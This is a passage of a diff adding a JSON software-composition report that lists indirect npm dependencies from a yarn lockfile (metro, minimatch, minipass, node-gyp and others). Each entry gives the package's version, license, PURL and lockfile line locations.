"UID": "9c7e6d92961709a7" + }, + "Version": "0.83.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/core@7.28.4", + "@babel/generator@7.28.3", + "@babel/parser@7.28.4", + "@babel/types@7.28.4", + "flow-enums-runtime@0.0.6", + "metro@0.83.3", + "metro-babel-transformer@0.83.3", + "metro-cache@0.83.3", + "metro-cache-key@0.83.3", + "metro-minify-terser@0.83.3", + "metro-source-map@0.83.3", + "metro-transform-plugins@0.83.3", + "nullthrows@1.1.1" + ], + "Locations": [ + { + "StartLine": 7555, + "EndLine": 7572 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "micromatch@4.0.8", + "Name": "micromatch", + "Identifier": { + "PURL": "pkg:npm/micromatch@4.0.8", + "UID": "82369eb774894958" + }, + "Version": "4.0.8", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "braces@3.0.3", + "picomatch@2.3.1" + ], + "Locations": [ + { + "StartLine": 7620, + "EndLine": 7626 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "mime@1.6.0", + "Name": "mime", + "Identifier": { + "PURL": "pkg:npm/mime@1.6.0", + "UID": "9532ee92ff6a1e4c" + }, + "Version": "1.6.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 7650, + "EndLine": 7653 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "mime@2.6.0", + "Name": "mime", + "Identifier": { + "PURL": "pkg:npm/mime@2.6.0", + "UID": "20be5c1babee3e50" + }, + "Version": "2.6.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 7640, + "EndLine": 7643 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "mime-db@1.52.0", + "Name": "mime-db", + "Identifier": { + "PURL": "pkg:npm/mime-db@1.52.0", + "UID": "c3ab07608fb8ffaf" + }, + "Version": "1.52.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 7628, + "EndLine": 7631 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "mime-types@2.1.35", + "Name": "mime-types", + "Identifier": { + "PURL": "pkg:npm/mime-types@2.1.35", + "UID": "75c1063c6b0675b" + }, + "Version": "2.1.35", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "mime-db@1.52.0" + ], + "Locations": [ + { + "StartLine": 7633, + "EndLine": 7638 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "mimic-fn@2.1.0", + "Name": "mimic-fn", + "Identifier": { + "PURL": "pkg:npm/mimic-fn@2.1.0", + "UID": "63e00c1467aa8327" + }, + "Version": "2.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 7655, + "EndLine": 7658 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "mimic-response@3.1.0", + "Name": "mimic-response", + "Identifier": { + "PURL": "pkg:npm/mimic-response@3.1.0", + "UID": "36679babef2f2833" + }, + "Version": "3.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 7660, + "EndLine": 7663 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "min-indent@1.0.1", + "Name": "min-indent", + "Identifier": { + "PURL": "pkg:npm/min-indent@1.0.1", + "UID": "58f800266015a753" + }, + "Version": "1.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 7665, + "EndLine": 7668 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "minimatch@10.0.3", + "Name": "minimatch", + "Identifier": { + "PURL": "pkg:npm/minimatch@10.0.3", + "UID": "85f0f94cea6a1bce" + }, + "Version": "10.0.3", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@isaacs/brace-expansion@5.0.0" + ], + "Locations": [ + { + "StartLine": 7670, + "EndLine": 7673 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "minimatch@3.1.2", + "Name": "minimatch", + "Identifier": { + "PURL": "pkg:npm/minimatch@3.1.2", + "UID": "2583e427b34671fe" + }, + "Version": "3.1.2", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "brace-expansion@1.1.12" + ], + "Locations": [ + { + "StartLine": 7696, + "EndLine": 7701 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "minimatch@8.0.7", + "Name": "minimatch", + "Identifier": { + "PURL": "pkg:npm/minimatch@8.0.7", + "UID": "33bea0b90add351f" + }, + "Version": "8.0.7", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "brace-expansion@2.0.2" + ], + "Locations": [ + { + "StartLine": 7703, + "EndLine": 7708 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "minimatch@9.0.5", + "Name": "minimatch", + "Identifier": { + "PURL": "pkg:npm/minimatch@9.0.5", + "UID": "7218c46a058dde84" + }, + "Version": "9.0.5", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "brace-expansion@2.0.2" + ], + "Locations": [ + { + "StartLine": 7717, + "EndLine": 7720 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "minimist@1.2.8", + "Name": "minimist", + "Identifier": { + "PURL": "pkg:npm/minimist@1.2.8", + "UID": "3734e60c4896596" + }, + "Version": "1.2.8", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 7731, + "EndLine": 7734 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "minimist-options@4.1.0", + "Name": "minimist-options", + "Identifier": { + "PURL": "pkg:npm/minimist-options@4.1.0", + "UID": "8b55f8d2f7ad8f74" + }, + "Version": "4.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "arrify@1.0.1", + "is-plain-obj@1.1.0", + "kind-of@6.0.3" + ], + "Locations": [ + { + "StartLine": 7722, + "EndLine": 7729 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "minipass@3.3.6", + "Name": "minipass", + "Identifier": { + "PURL": "pkg:npm/minipass@3.3.6", + "UID": "4bb011cdcd78163b" + }, + "Version": "3.3.6", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "yallist@4.0.0" + ], + "Locations": [ + { + "StartLine": 7812, + "EndLine": 7817 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "minipass@4.2.8", + "Name": "minipass", + "Identifier": { + "PURL": "pkg:npm/minipass@4.2.8", + "UID": "97775e5a3d74b7c2" + }, + "Version": "4.2.8", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 7819, + "EndLine": 7822 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "minipass@7.1.2", + "Name": "minipass", + "Identifier": { + "PURL": "pkg:npm/minipass@7.1.2", + "UID": "3afe664c1ca5f2b7" + }, + "Version": "7.1.2", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 7824, + "EndLine": 7827 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "minipass-collect@2.0.1", + "Name": "minipass-collect", + "Identifier": { + "PURL": "pkg:npm/minipass-collect@2.0.1", + "UID": "6a4db0c2755ebe58" + }, + "Version": "2.0.1", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "minipass@7.1.2" + ], + "Locations": [ + { + "StartLine": 7743, + "EndLine": 7748 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "minipass-fetch@4.0.1", + "Name": "minipass-fetch", + "Identifier": { + "PURL": "pkg:npm/minipass-fetch@4.0.1", + "UID": "ccc45a302dd0cfc2" + }, + "Version": "4.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "minipass@7.1.2", + "minipass-sized@1.0.3", + "minizlib@3.1.0" + ], + "Locations": [ + { + "StartLine": 7761, + "EndLine": 7768 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "minipass-flush@1.0.5", + "Name": "minipass-flush", + "Identifier": { + "PURL": "pkg:npm/minipass-flush@1.0.5", + "UID": "791b5dbb716669ff" + }, + "Version": "1.0.5", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "minipass@3.3.6" + ], + "Locations": [ + { + "StartLine": 7770, + "EndLine": 7775 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "minipass-pipeline@1.2.4", + "Name": "minipass-pipeline", + "Identifier": { + "PURL": "pkg:npm/minipass-pipeline@1.2.4", + "UID": "a8a6d4a0d72db3d3" + }, + "Version": "1.2.4", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "minipass@3.3.6" + ], + "Locations": [ + { + "StartLine": 7777, + "EndLine": 7782 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "minipass-sized@1.0.3", + "Name": "minipass-sized", + "Identifier": { + "PURL": "pkg:npm/minipass-sized@1.0.3", + "UID": "18bdd5240b606403" + }, + "Version": "1.0.3", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "minipass@3.3.6" + ], + "Locations": [ + { + "StartLine": 7784, + "EndLine": 7789 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "minizlib@3.1.0", + "Name": "minizlib", + "Identifier": { + "PURL": "pkg:npm/minizlib@3.1.0", + "UID": "f511aa6a4d4696e8" + }, + "Version": "3.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "minipass@7.1.2" + ], + "Locations": [ + { + "StartLine": 7842, + "EndLine": 7847 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "mkdirp@1.0.4", + "Name": "mkdirp", + "Identifier": { + "PURL": "pkg:npm/mkdirp@1.0.4", + "UID": "7c207081f40d7be5" + }, + "Version": "1.0.4", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 7854, + "EndLine": 7857 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "mkdirp-classic@0.5.3", + "Name": "mkdirp-classic", + "Identifier": { + "PURL": "pkg:npm/mkdirp-classic@0.5.3", + "UID": "a9b9d00ff8d8ec51" + }, + "Version": "0.5.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 7849, + "EndLine": 7852 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "ms@2.0.0", + "Name": "ms", + "Identifier": { + "PURL": "pkg:npm/ms@2.0.0", + "UID": "d40bb30469804a" + }, + "Version": "2.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 7869, + "EndLine": 7872 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "ms@2.1.3", + "Name": "ms", + "Identifier": { + "PURL": "pkg:npm/ms@2.1.3", + "UID": "19c0ded94545f8a2" + }, + "Version": "2.1.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 7864, + "EndLine": 7867 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "mute-stream@2.0.0", + "Name": "mute-stream", + "Identifier": { + "PURL": "pkg:npm/mute-stream@2.0.0", + "UID": "c2feec0593cfbeeb" + }, + "Version": "2.0.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 7874, + "EndLine": 7875 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "nanoid@3.3.11", + "Name": "nanoid", + "Identifier": { + "PURL": "pkg:npm/nanoid@3.3.11", + "UID": "e73947d96bf98f3d" + }, + "Version": "3.3.11", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 7877, + "EndLine": 7880 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "napi-build-utils@2.0.0", + "Name": "napi-build-utils", + "Identifier": { + "PURL": "pkg:npm/napi-build-utils@2.0.0", + "UID": "10e1ffc8e9fff7b9" + }, + "Version": "2.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 7882, + "EndLine": 7885 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "negotiator@0.6.3", + "Name": "negotiator", + "Identifier": { + "PURL": "pkg:npm/negotiator@0.6.3", + "UID": "968d435eebf24a8d" + }, + "Version": "0.6.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 7902, + "EndLine": 7905 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "negotiator@1.0.0", + "Name": "negotiator", + "Identifier": { + "PURL": "pkg:npm/negotiator@1.0.0", + "UID": "682c027add6db8c8" + }, + "Version": "1.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 7897, + "EndLine": 7900 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "no-case@3.0.4", + "Name": "no-case", + "Identifier": { + "PURL": "pkg:npm/no-case@3.0.4", + "UID": "43554e2272b44359" + }, + "Version": "3.0.4", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "lower-case@2.0.2", + "tslib@2.8.1" + ], + "Locations": [ + { + "StartLine": 7907, + "EndLine": 7913 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "node-abi@3.78.0", + "Name": "node-abi", + "Identifier": { + "PURL": "pkg:npm/node-abi@3.78.0", + "UID": "ecb3c598f134c095" + }, + "Version": "3.78.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "semver@7.7.3" + ], + "Locations": [ + { + "StartLine": 7920, + "EndLine": 7925 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "node-addon-api@6.1.0", + "Name": "node-addon-api", + "Identifier": { + "PURL": "pkg:npm/node-addon-api@6.1.0", + "UID": "a2a25e465252ea99" + }, + "Version": "6.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 7927, + "EndLine": 7930 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "node-fetch@1.7.3", + "Name": "node-fetch", + "Identifier": { + "PURL": "pkg:npm/node-fetch@1.7.3", + "UID": "6acbb9f806f1d654" + }, + "Version": "1.7.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "encoding@0.1.13", + "is-stream@1.1.0" + ], + "Locations": [ + { + "StartLine": 7937, + "EndLine": 7943 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "node-gyp@11.4.2", + "Name": "node-gyp", + "Identifier": { + "PURL": "pkg:npm/node-gyp@11.4.2", + "UID": "c7f26321de620208" + }, + "Version": "11.4.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "env-paths@2.2.1", + "exponential-backoff@3.1.2", + "graceful-fs@4.2.11", + "make-fetch-happen@14.0.3", + "nopt@8.1.0", + "proc-log@5.0.0", + "semver@7.7.3", + "tar@7.5.1", + "tinyglobby@0.2.15", + "which@5.0.0" + ], + "Locations": [ + { + "StartLine": 7945, + "EndLine": 7957 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "node-html-parser@7.0.1", + "Name": "node-html-parser", + "Identifier": { + "PURL": "pkg:npm/node-html-parser@7.0.1", + "UID": "b02135a33e88ce4e" + }, + "Version": "7.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "css-select@5.2.2", + "he@1.2.0" + ], + "Locations": [ + { + "StartLine": 7975, + "EndLine": 7981 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "node-int64@0.4.0", + "Name": "node-int64", + "Identifier": { + "PURL": "pkg:npm/node-int64@0.4.0", + "UID": "c2a9bfa3ae4ffa3b" + }, + "Version": "0.4.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 7983, + "EndLine": 7986 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "node-releases@2.0.23", + "Name": "node-releases", + "Identifier": { + "PURL": "pkg:npm/node-releases@2.0.23", + "UID": "278eee987e9476fa" + }, + "Version": "2.0.23", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 7988, + "EndLine": 7991 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "noop-fn@1.0.0", + "Name": "noop-fn", + "Identifier": { + "PURL": "pkg:npm/noop-fn@1.0.0", + "UID": "43401c296c887994" + }, + "Version": "1.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 7998, + "EndLine": 8001 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "nopt@8.1.0", + "Name": "nopt", + "Identifier": { + "PURL": "pkg:npm/nopt@8.1.0", + "UID": "c17c3fdd9805c309" + }, + "Version": "8.1.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "abbrev@3.0.1" + ], + "Locations": [ + { + "StartLine": 8010, + "EndLine": 8013 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "normalize-package-data@2.5.0", + "Name": "normalize-package-data", + "Identifier": { + "PURL": "pkg:npm/normalize-package-data@2.5.0", + "UID": "4d21e0eecbf40fdf" + }, + "Version": "2.5.0", + "Licenses": [ + "BSD-2-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "hosted-git-info@2.8.9", + "resolve@1.22.10", + "semver@5.7.2", + "validate-npm-package-license@3.0.4" + ], + "Locations": [ + { + "StartLine": 8015, + "EndLine": 8023 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "normalize-package-data@3.0.3", + "Name": "normalize-package-data", + "Identifier": { + "PURL": "pkg:npm/normalize-package-data@3.0.3", + "UID": "13ff78492e989a1b" + }, + "Version": "3.0.3", + "Licenses": [ + "BSD-2-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "hosted-git-info@4.1.0", + "is-core-module@2.16.1", + "semver@7.7.3", + "validate-npm-package-license@3.0.4" + ], + "Locations": [ + { + "StartLine": 8025, + "EndLine": 8033 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "normalize-path@3.0.0", + "Name": "normalize-path", + "Identifier": { + "PURL": "pkg:npm/normalize-path@3.0.0", + "UID": "ceadd7943ac055b0" + }, + "Version": "3.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 8035, + "EndLine": 8038 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "npm-audit-report@6.0.0", + "Name": "npm-audit-report", + "Identifier": { + "PURL": "pkg:npm/npm-audit-report@6.0.0", + "UID": "c268433d084fcf46" + }, + "Version": "6.0.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 8040, + "EndLine": 8041 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "npm-bundled@4.0.0", + "Name": "npm-bundled", + "Identifier": { + "PURL": "pkg:npm/npm-bundled@4.0.0", + "UID": "30d94ba42a6ecff5" + }, + "Version": "4.0.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "npm-normalize-package-bin@4.0.0" + ], + "Locations": [ + { + "StartLine": 8043, + "EndLine": 8046 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "npm-install-checks@7.1.2", + "Name": "npm-install-checks", + "Identifier": { + "PURL": "pkg:npm/npm-install-checks@7.1.2", + "UID": "d7d659b6852b60b8" + }, + "Version": "7.1.2", + "Licenses": [ + "BSD-2-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "semver@7.7.3" + ], + "Locations": [ + { + "StartLine": 8048, + "EndLine": 8051 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "npm-normalize-package-bin@4.0.0", + "Name": "npm-normalize-package-bin", + "Identifier": { + "PURL": "pkg:npm/npm-normalize-package-bin@4.0.0", + "UID": "13becbc7c26a5cee" + }, + "Version": "4.0.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 8053, + "EndLine": 8054 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "npm-package-arg@13.0.1", + "Name": "npm-package-arg", + "Identifier": { + "PURL": "pkg:npm/npm-package-arg@13.0.1", + "UID": "faef2892f701f54c" + }, + "Version": "13.0.1", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "hosted-git-info@9.0.2", + "proc-log@5.0.0", + "semver@7.7.3", + "validate-npm-package-name@6.0.2" + ], + "Locations": [ + { + "StartLine": 8056, + "EndLine": 8062 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "npm-packlist@10.0.2", + "Name": "npm-packlist", + "Identifier": { + "PURL": "pkg:npm/npm-packlist@10.0.2", + "UID": "bd8730f70b27fc09" + }, + "Version": "10.0.2", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "ignore-walk@8.0.0", + "proc-log@5.0.0" + ], + "Locations": [ + { + "StartLine": 8064, + "EndLine": 8068 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "npm-pick-manifest@11.0.1", + "Name": "npm-pick-manifest", + "Identifier": { + "PURL": "pkg:npm/npm-pick-manifest@11.0.1", + "UID": "eaad1065eb28bca0" + }, + "Version": "11.0.1", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "npm-install-checks@7.1.2", + "npm-normalize-package-bin@4.0.0", + "npm-package-arg@13.0.1", + "semver@7.7.3" + ], + "Locations": [ + { + "StartLine": 8070, + "EndLine": 8076 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "npm-profile@12.0.0", + "Name": "npm-profile", + "Identifier": { + "PURL": "pkg:npm/npm-profile@12.0.0", + "UID": "d621bf2974e1855" + }, + "Version": "12.0.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "npm-registry-fetch@19.0.0", + "proc-log@5.0.0" + ], + "Locations": [ + { + "StartLine": 8078, + "EndLine": 8082 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "npm-registry-fetch@19.0.0", + "Name": "npm-registry-fetch", + "Identifier": { + "PURL": "pkg:npm/npm-registry-fetch@19.0.0", + "UID": "7baae6d448c7e28b" + }, + "Version": "19.0.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@npmcli/redact@3.2.2", + "jsonparse@1.3.1", + "make-fetch-happen@15.0.2", + "minipass@7.1.2", + "minipass-fetch@4.0.1", + "minizlib@3.1.0", + "npm-package-arg@13.0.1", + "proc-log@5.0.0" + ], + "Locations": [ + { + "StartLine": 8084, + "EndLine": 8094 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "npm-run-path@4.0.1", + "Name": "npm-run-path", + "Identifier": { + "PURL": "pkg:npm/npm-run-path@4.0.1", + "UID": "3c4cc97ae9fb78b1" + }, + "Version": "4.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "path-key@3.1.1" + ], + "Locations": [ + { + "StartLine": 8096, + "EndLine": 8101 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "npm-user-validate@3.0.0", + "Name": "npm-user-validate", + "Identifier": { + "PURL": "pkg:npm/npm-user-validate@3.0.0", + "UID": "1d52b245e91bed61" + }, + "Version": "3.0.0", + "Licenses": [ + "BSD-2-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 8103, + "EndLine": 8104 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "npmlog@4.1.2", + "Name": "npmlog", + "Identifier": { + "PURL": "pkg:npm/npmlog@4.1.2", + "UID": "8f757afb1f2a82e5" + }, + "Version": "4.1.2", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "are-we-there-yet@1.1.7", + "console-control-strings@1.1.0", + "gauge@2.7.4", + "set-blocking@2.0.0" + ], + "Locations": [ + { + "StartLine": 8177, + "EndLine": 8185 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "nth-check@2.1.1", + "Name": "nth-check", + "Identifier": { + "PURL": "pkg:npm/nth-check@2.1.1", + "UID": "aeffab015638bd03" + }, + "Version": "2.1.1", + "Licenses": [ + "BSD-2-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "boolbase@1.0.0" + ], + "Locations": [ + { + "StartLine": 8197, + "EndLine": 8202 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "nullthrows@1.1.1", + "Name": "nullthrows", + "Identifier": { + "PURL": "pkg:npm/nullthrows@1.1.1", + "UID": "6c4df0261a54fac6" + }, + "Version": "1.1.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 8204, + "EndLine": 8207 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "number-is-nan@1.0.1", + "Name": "number-is-nan", + "Identifier": { + "PURL": "pkg:npm/number-is-nan@1.0.1", + "UID": "ee1e112181c387e6" + }, + "Version": "1.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 8209, + "EndLine": 8212 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "ob1@0.83.3", + "Name": "ob1", + "Identifier": { + "PURL": "pkg:npm/ob1@0.83.3", + "UID": "746b959c8783407a" + }, + "Version": "0.83.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "flow-enums-runtime@0.0.6" + ], + "Locations": [ + { + "StartLine": 8214, + "EndLine": 8219 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "object-assign@4.1.1", + "Name": "object-assign", + "Identifier": { + "PURL": "pkg:npm/object-assign@4.1.1", + "UID": "c7a2bf8e2863c4e6" + }, + "Version": "4.1.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 8221, + "EndLine": 8224 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "on-finished@2.3.0", + "Name": "on-finished", + "Identifier": { + "PURL": "pkg:npm/on-finished@2.3.0", + "UID": "6f9f18fa16e9adc0" + }, + "Version": "2.3.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "ee-first@1.1.1" + ], + "Locations": [ + { + "StartLine": 8278, + "EndLine": 8283 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "on-finished@2.4.1", + "Name": "on-finished", + "Identifier": { + "PURL": "pkg:npm/on-finished@2.4.1", + "UID": "6e3ba33db6a82d6b" + }, + "Version": "2.4.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "ee-first@1.1.1" + ], + "Locations": [ + { + "StartLine": 8285, + "EndLine": 8290 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "once@1.4.0", + "Name": "once", + "Identifier": { + "PURL": "pkg:npm/once@1.4.0", + "UID": "769fdbfc21c99ee" + }, + "Version": "1.4.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "wrappy@1.0.2" + ], + "Locations": [ + { + "StartLine": 8297, + "EndLine": 8302 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "onetime@5.1.2", + "Name": "onetime", + "Identifier": { + "PURL": "pkg:npm/onetime@5.1.2", + "UID": "412a065f4de5b621" + }, + "Version": "5.1.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "mimic-fn@2.1.0" + ], + "Locations": [ + { + "StartLine": 8304, + "EndLine": 8309 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "open@7.4.2", + "Name": "open", + "Identifier": { + "PURL": "pkg:npm/open@7.4.2", + "UID": "568d0c1092fe16f2" + }, + "Version": "7.4.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "is-docker@2.2.1", + "is-wsl@2.2.0" + ], + "Locations": [ + { + "StartLine": 8326, + "EndLine": 8332 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "ora@5.4.1", + "Name": "ora", + "Identifier": { + "PURL": "pkg:npm/ora@5.4.1", + "UID": 